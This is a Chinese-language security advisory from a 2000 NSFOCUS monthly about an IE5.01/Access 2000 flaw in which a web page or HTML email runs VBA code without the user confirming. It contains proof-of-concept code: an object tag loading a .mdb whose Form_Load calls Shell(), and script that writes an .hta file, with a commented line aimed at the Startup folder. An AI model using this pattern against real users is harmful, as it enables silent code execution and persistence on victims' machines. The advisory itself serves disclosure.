首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第11期->最新漏洞
期刊号: 类型: 关键词:
微软IE5.01和Access 2000执行VBA代码漏洞

日期:2000-07-11

受影响的系统:  
     Microsoft Access 2000
       + Microsoft Office 2000
          - Microsoft Windows 98
          - Microsoft Windows 95
          - Microsoft Windows NT 4.0
          - Microsoft Windows NT 2000

    Microsoft Internet Explorer 5.01
       + Microsoft Windows 98
       + Microsoft Windows 95
       + Microsoft Windows NT 4.0
       + Microsoft Windows NT 2000

不受影响系统:  

描述:
--------------------------------------------------------------------------------


如果客户方使用IE5.01和Access 2000,完全有可能被服务方远程执行VBA代码。当你
访问WWW页面或者收到并查看HTML格式电子邮件的时候,服务方利用IFRAME技术,并
不需要客户方确认,就可以做到这点。创建包含VBA代码的*.mdb文件,其中的
shell()调用足以执行客户方任意已知可执行文件。接下来,在HTML页面中通过
object tag引用这些恶意的*.mdb文件,当浏览器加载这种页面的时候,VBA代码被执
行。

<* 来源:Georgi Guninski joro@nat.bg *>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
    Dim stAppName As String
    stAppName = "C:\Program Files\Accessories\wordpad.exe"
    MsgBox ("Trying to start: " & stAppName)
    Call Shell(stAppName, 1)

Exit_Command0_Click:
    Exit Sub

Err_Command0_Click:
    MsgBox Err.Description
    Resume Exit_Command0_Click
End Sub
---------------------------------------------------

---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------



--------------------------------------------------------------------------------
建议:

暂无




版权所有,未经许可,不得转载